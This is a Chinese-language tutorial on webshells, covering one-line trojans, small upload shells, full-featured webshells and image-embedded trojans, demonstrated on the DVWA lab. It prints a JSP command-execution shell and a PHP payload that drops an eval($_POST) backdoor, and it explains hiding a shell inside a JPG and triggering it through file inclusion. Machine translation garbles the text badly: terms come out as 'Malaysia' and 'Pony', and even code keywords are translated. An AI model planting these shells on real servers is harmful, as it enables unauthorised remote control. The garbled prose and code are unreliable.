webshell总结 webshell是一种什么工具

一、webshell概况

1.webshell概念：

客户的网站经常上传各种大小的马匹。我们所说的“马”是指特洛伊木马，而不是真正的马。 攻击者通常利用文件上传漏洞来上传可执行和可解析的脚本文件。通过这个脚本，您将能够在服务器端执行命令。这就是你经常听到的WebShell，这个脚本文件是：我们常说的马或小马。 1.马有哪些种类？小马的优点是体积较小，功能较少，更难找到且功能单一。经常用作上传到DaMa的垫脚石。 马来西亚幅员辽阔，实力雄厚，但很容易找到。 One Sentence 特洛伊木马是另一种源自Pony 和Big Horse 的特洛伊木马。您所需要的只是一行简短的代码和WebShell 工具的组合（菜刀、蚁剑、冰蝎子等）。功能相当于大马（执行命令行、文件上传、文件下载等功能）。

2.小马和一句话木马的区别和联系？

特洛伊木马是一种伪装成合法程序或文件植入用户设备的恶意软件。单行木马是一种特殊的木马，仅包含一行代码，利用操作系统特性进行恶意操作。

功能：Pony 通常具有多种功能，可用于窃取敏感信息、远程控制受感染的设备以及植入其他恶意软件。一句话木马的功能比较简单，通常用于远程控制受感染设备，包括执行命令、上传下载文件等。传播方式：小马通常采用社会工程手段诱骗用户下载运行，或利用漏洞自动传播。单句木马通常通过利用服务器漏洞或网络钓鱼攻击等网络攻击方式进行传播。大脑封闭术：小马通常会尽可能隐藏自己的存在，以避免被用户注意到。一句话木马代码非常短，很容易隐藏在合法脚本后面，降低被发现的可能性。

Pony 和单句木马有一些相似之处，但主要区别在于单句木马注重简单性和效率，而Pony 则更加多样化且功能丰富。在实践中，声明木马有时被用作小马的一部分。

3.一句话木马的优缺点

优点：简短、简洁、强大。

缺点：容易被安全软件检测到。为了增加隐蔽性，还出现了各种单句木马变体。

4.怎样搭建文件上传的靶场？

ps：有些关卡只能在Windows上构建，有些关卡只能在Linux上构建，所以两种构建方法都需要。

1.直接指定Windows dvwa并上传库

2.Linux系统使用docker下载。

二、一句话木马

1.一句话木马定义

特洛伊木马的正式名称是托管在您的计算机中的恶意远程控制程序。特洛伊木马程序是黑客最常用的工具之一，因为它们可以在计算机管理员不知情的情况下开放系统权限、泄露用户信息或窃取整个计算机的管理权限。

简而言之，木马就是一段简单的代码，仅仅用这短短的一行代码就可以实现与马来西亚木马相同的功能。木马短句

它结构紧凑、功能强大且非常隐秘，在入侵中始终发挥着非常重要的作用。

简而言之，特洛伊木马就是一匹小马。防火墙会拦截数据包的内容，因此，如果它检测到数据包中包含关键字system，就会让请求通过。所以先上传一个内容简单的小马，然后再上传。控制对方机器后的巨大代码和仙马。这扩大了您的管理权限。

三、小马

1.概念

小马和大马都是网页后门的类型，用于控制网站权限。主要区别在于小马是用来上传大马的。我在通过Pony上传马来西亚时有一个问题。这并不是多余的。为什么要使用Pony上传马来西亚？为什么不直接上传到马来西亚使用呢？事实上，这是由于Pony体积更小，比Big Horse有更好的隐蔽性优势，以及文件大小上传限制的漏洞，而且Pony也常用作备份后门。

2.网页小马概念：

Pony非常小，只有2KB，隐蔽性非常好。 Pony的功能很简单，就是一个上传功能，而且它唯一的功能就是上传文件，没有别的。它可以通过一些安全扫描。小马是上传到马来西亚的。很多漏洞都有上传限制，在马来西亚上传不了，所以必须先上传小马，然后通过小马上传马来西亚。 Pony还可以利用IIS中的漏洞结合图像合成来执行。

它在幕后使用用Java语言编写的JSP木马。与之前的一句话木马不同，Chopper 的JSP 木马更长。下面是一个简单的JSP小马。

%

if(\’123\’.equals(request.getParameter(\’pwd\’))){

java.io.InputStream in=Runtime.getRuntime().exec(request.getParameter(\’i\’)).getInputStream();

整数a=-1；

byte[] b=新字节[2048];

输出.print(\’pre\’);

while((a=in.read(b))!=-1){

out.println(新字符串(b));

}

输出.print(\’/pre\’);

}

%

如果上传成功后可以解析，则通过请求http://服务器IP:端口/Shell/cmd.jsp?pwd=123i=ipconfig来运行命令。

四、网页大马：

1.概念

虽然Malaysia的体积比较大，一般在50K左右，是Pony的几倍，但是相应的数据管理、命令操作、数据库管理、解压、提权等功能也非常强大。很强大。一旦这个马来西亚建立了一个网站，这个网站基本上就在这个马来西亚的控制之下了。马来西亚的掩盖很糟糕，因为它包含大量敏感代码，很容易被安全程序扫描。

中国刀刑不算。 通过客户端操作时，中国刀一句话也很厉害。 一句代码可以和马来西亚实现的一样。当我说小马和大马时，我指的是网页类型。小马帮助大马上传。小马也常被用作后门。大型马更容易找到，但小马更有可能隐藏在系统的文件夹中。

2.使用

我们看一下马来西亚的用例：在虚拟机中将PHP Malaysia上传到DVWA（最后附上源代码）:

访问木马文件123.php，提交密码123456即可进入马来西亚功能列表。 下图显示了文件管理功能。

继续访问命令执行功能（其他功能未显示）。

马来西亚：

大马.php

五、图片马

1.概念

如果防御系数比较高（DVWA范围高，但文件包含漏洞也可以被利用）

如何成功上传木马？防御者通常会根据类型、大小等进行过滤。如果您提供照片上传选项，我们也会收集您的照片。即使攻击者更改文件类型，他们也无法突破图像收集级别（某些文件内容的验证）。因此，您需要一张照片作为封面。创建隐藏在照片下方的特洛伊木马。 Linux 和Windows 都有相应的命令，允许您将一个文件合并到另一个文件后面以达到隐藏的目的。

您可以看到高级代码读取文件名中最后一个“.”之后的字符串，并期望通过文件名限制文件类型。因此，上传的文件名必须采用以下格式： “*.jpg”、“.jpeg”或“*.png”。同时getimagesize()函数将上传文件的文件头限制为图片类型。

2.制作图片马并使用：

首先，您需要将上传文件的文件头伪装成图片。首先，使用复制命令将一句话木马文件Hack.php与常规图像文件ClearSky.jpg合并。

【注意】以下是使用CMD上的复制命令创建“图片木马”的步骤。其中，ClearSky.jpg/b中的“b”表示“二进制文件”，hack中的“a”表示。 php/a 表示ASCII 代码文件。

使用木马生成图像文件hack.jpg。

接下来，当您打开生成的木马图像文件时，您会注意到图像文件的末尾附加了文本木马。

然后我尝试上传生成的木马图片文件hack.jpg，上传成功。

接下来访问图片木马，但由于是图片木马，导致PHP脚本无法解析，Chopper连接木马失败。

3.利用图片马：

新思路：结合DVWA射击场自带的包含漏洞的文件，可以上传PHP木马并连接到刀上。 下面是攻击的演示。首先按照上述方法新建一个图片木马，并将图片文件后面的PHP脚本修改如下：

?php fputs(fopen(\’muma.php\’,\’w\’),\’?php @eval($_POST[hack]);\’);

使用新木马将其上传到DVWA，并使用文件包含漏洞模块访问木马文件。此时，DVWA文件中存在漏洞的路径下会自动生成一个PHP一句话木马脚本文件muma.php。

此时再次连刀即可连接成功。至此，我们通过结合文件包含漏洞，将图片木马上传到只能上传图片的文件上传功能，成功生成了一句话木马。

以上关于#WebShell概述的相关内容摘自互联网，仅供参考。相关信息请参见官方公告。